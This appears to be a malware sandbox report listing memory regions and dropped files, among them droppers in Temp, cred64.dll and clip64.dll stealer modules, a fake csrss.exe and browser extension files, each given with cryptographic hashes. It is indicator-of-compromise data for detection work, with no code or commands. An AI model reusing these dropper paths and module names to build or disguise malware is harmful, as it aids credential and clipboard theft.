SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/196-609-0x00000000003B0000-0x000000000052E000-memory.dmp

\Users\Admin\AppData\Local\Temp\A1B2.exe

MD5 dd007c4e6d34d7270ec93a99f14e2793
SHA1 a168c1b975d3268646f2443444f805e7f5dd0312
SHA256 df696ba95cdd47b74f8393c8a27cf824cb39c0a0613d65708c12cbf988cf0852
SHA512 cd834e05639c3b6ced81071f1aa1bb62955fe667b1106f54d67acc74d4eefd778ff869040ccb14517d13a0c51ce63b1a4222f008b2ff33b48d12bcde66a3b3f6

memory/196-613-0x0000000072CF0000-0x00000000733DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSA97A.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

C:\Users\Admin\AppData\Local\Temp\7zSA97A.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

C:\Users\Admin\AppData\Local\Temp\7zSA97A.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

\Users\Admin\AppData\Local\Temp\A1B2.exe

MD5 dd007c4e6d34d7270ec93a99f14e2793
SHA1 a168c1b975d3268646f2443444f805e7f5dd0312
SHA256 df696ba95cdd47b74f8393c8a27cf824cb39c0a0613d65708c12cbf988cf0852
SHA512 cd834e05639c3b6ced81071f1aa1bb62955fe667b1106f54d67acc74d4eefd778ff869040ccb14517d13a0c51ce63b1a4222f008b2ff33b48d12bcde66a3b3f6

memory/4616-622-0x0000000072CF0000-0x00000000733DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 b224196c88f09b615527b2df0e860e49
SHA1 f9ae161836a34264458d8c0b2a083c98093f1dec
SHA256 2a11969fcc1df03533ad694a68d56f0e3a67ce359663c3cf228040ab5baa5ed8
SHA512 d74376c5bd3ba19b8454a17f2f38ab64ad1005b6372c7e162230c822c38f6f8c7d87aef47ef04cb6dceedc731046c30efa6720098cc39b15addd17c809b8296d

C:\Users\Admin\AppData\Local\Temp\K.exe

MD5 ac65407254780025e8a71da7b925c4f3
SHA1 5c7ae625586c1c00ec9d35caa4f71b020425a6ba
SHA256 26cd9cc9a0dd688411a4f0e2fa099b694b88cab6e9ed10827a175f7b5486e42e
SHA512 27d87730230d9f594908f904bf298a28e255dced8d515eb0d97e1701078c4405f9f428513c2574d349a7517bd23a3558fb09599a01499ea54590945b981b17ab

memory/5348-635-0x0000000000F90000-0x0000000000F98000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp

MD5 e57693101a63b1f934f462bc7a2ef093
SHA1 2748ea8c66b980f14c9ce36c1c3061e690cf3ce7
SHA256 71267ff94c9fc72cbffaeed3bc2f33cef1eeb1887c29c574d7f26595d1a6235f
SHA512 3dcda686a85b19a9c7b4c96d132e90ed43c7df13ce9456beb2b88c278d8068cc3abcbfe25b1607c7b8281d276efb24809730f352927b326254f3208cbdf54a3e

C:\Users\Admin\AppData\Local\Temp\is-3C37I.tmp\is-67DQ6.tmp

MD5 e57693101a63b1f934f462bc7a2ef093
SHA1 2748ea8c66b980f14c9ce36c1c3061e690cf3ce7
SHA256 71267ff94c9fc72cbffaeed3bc2f33cef1eeb1887c29c574d7f26595d1a6235f
SHA512 3dcda686a85b19a9c7b4c96d132e90ed43c7df13ce9456beb2b88c278d8068cc3abcbfe25b1607c7b8281d276efb24809730f352927b326254f3208cbdf54a3e

memory/5348-643-0x000000001BAC0000-0x000000001BAD0000-memory.dmp

memory/5348-640-0x00007FFFB6A70000-0x00007FFFB745C000-memory.dmp

memory/196-639-0x0000000072CF0000-0x00000000733DE000-memory.dmp

memory/5504-647-0x0000000001080000-0x000000000176F000-memory.dmp

memory/5424-659-0x00000000001F0000-0x00000000001F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\K.exe

MD5 ac65407254780025e8a71da7b925c4f3
SHA1 5c7ae625586c1c00ec9d35caa4f71b020425a6ba
SHA256 26cd9cc9a0dd688411a4f0e2fa099b694b88cab6e9ed10827a175f7b5486e42e
SHA512 27d87730230d9f594908f904bf298a28e255dced8d515eb0d97e1701078c4405f9f428513c2574d349a7517bd23a3558fb09599a01499ea54590945b981b17ab

memory/5292-631-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 b224196c88f09b615527b2df0e860e49
SHA1 f9ae161836a34264458d8c0b2a083c98093f1dec
SHA256 2a11969fcc1df03533ad694a68d56f0e3a67ce359663c3cf228040ab5baa5ed8
SHA512 d74376c5bd3ba19b8454a17f2f38ab64ad1005b6372c7e162230c822c38f6f8c7d87aef47ef04cb6dceedc731046c30efa6720098cc39b15addd17c809b8296d

C:\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

C:\Users\Admin\AppData\Local\Temp\kos2.exe

MD5 665db9794d6e6e7052e7c469f48de771
SHA1 ed9a3f9262f675a03a9f1f70856e3532b095c89f
SHA256 c1b31186d170a2a5755f15682860b3cdc60eac7f97a2db9462dee7ca6fcbc196
SHA512 69585560e8ac4a2472621dd4da4bf0e636688fc5d710521b0177461f773fcf2a4c7ddb86bc812ecb316985729013212ccfa4992cd1c98f166a4a510e17fcae74

memory/3524-606-0x0000000072CF0000-0x00000000733DE000-memory.dmp

memory/3524-665-0x0000000000400000-0x000000000047E000-memory.dmp

memory/3524-666-0x0000000072CF0000-0x00000000733DE000-memory.dmp

memory/916-681-0x00000000009B0000-0x0000000000AB0000-memory.dmp

memory/916-684-0x00000000022A0000-0x00000000022A9000-memory.dmp

memory/4380-686-0x0000000002A80000-0x0000000002E79000-memory.dmp

memory/5752-687-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4380-688-0x0000000002F80000-0x000000000386B000-memory.dmp

memory/5752-689-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

memory/5812-705-0x0000000000400000-0x0000000000627000-memory.dmp

memory/4380-706-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5292-708-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/5988-709-0x0000000000400000-0x0000000000627000-memory.dmp

memory/5348-716-0x00007FFFB6A70000-0x00007FFFB745C000-memory.dmp

memory/5752-723-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5348-728-0x000000001BAC0000-0x000000001BAD0000-memory.dmp

memory/5504-729-0x0000000001080000-0x000000000176F000-memory.dmp

memory/5424-732-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/4380-735-0x0000000002A80000-0x0000000002E79000-memory.dmp

memory/4380-742-0x0000000002F80000-0x000000000386B000-memory.dmp

memory/4320-741-0x0000000000E40000-0x0000000001220000-memory.dmp

memory/4320-743-0x0000000005A50000-0x0000000005AEC000-memory.dmp

memory/4380-745-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/4320-748-0x0000000072CF0000-0x00000000733DE000-memory.dmp

memory/5540-747-0x0000000005210000-0x0000000005246000-memory.dmp

memory/5540-750-0x00000000078F0000-0x0000000007F18000-memory.dmp

memory/5540-751-0x0000000072CF0000-0x00000000733DE000-memory.dmp

memory/5540-752-0x00000000051C0000-0x00000000051D0000-memory.dmp

memory/5540-753-0x0000000007F50000-0x0000000007F72000-memory.dmp

memory/5540-756-0x0000000007FF0000-0x0000000008056000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5yrbytwd.4be.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\O0VC263T\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Roaming\befuhfh

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

C:\Windows\rss\csrss.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\HuicvfN.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 b022b1a47e2a09e3666a20f14d0f1594
SHA1 25f7cab6fb1a7eaf885768c0c3a77b433272ded0
SHA256 ddb86c36d1a03a5bd6dad3bc212ac35077405b48887c54b9fbdd56bd0ee4d70e
SHA512 9e83d73e0d6609c43eb79cf078bff3de5e3aa14a14d1bdad53153e332c013de8305380b0b1b44c1964cc75eca040db39430185c362f29ad59e958d8ded9393d6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\h0hg436k.default-release\prefs.js

MD5 215b4709f3ad7b8ba217db8f7569eb67
SHA1 456a151c4e0a50b2760f8353da0f2bcfc5474cbb
SHA256 5a0e28ed0042ca75fde60d5cdbbf68d79ed664c2b03a15ddcf089fc389437d46
SHA512 2e95adef65db1da4c2ada3342e8d4f808fc480f9471e146b9d632eb4e73e23565f75db52aa7702a35b1eaa0cf944981c12b43873970811a907198eb2136b02f5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 fe5bff662e6753e89e3be4d50b840e21
SHA1 7e14ac9ec91259552e235dd1a6c26ee8ffb56b08
SHA256 9f8d5251a7960f7219c5ea6719486e07b12dd24506ab95ff8411eae22ca42de5
SHA512 b2430ede9260e754c3145401861f01abbc2bc6aeeca82d5022510adb4a7465542cfc038e1f514ba55a5241205941e015073824adab6db4b2e34a443bfaec616f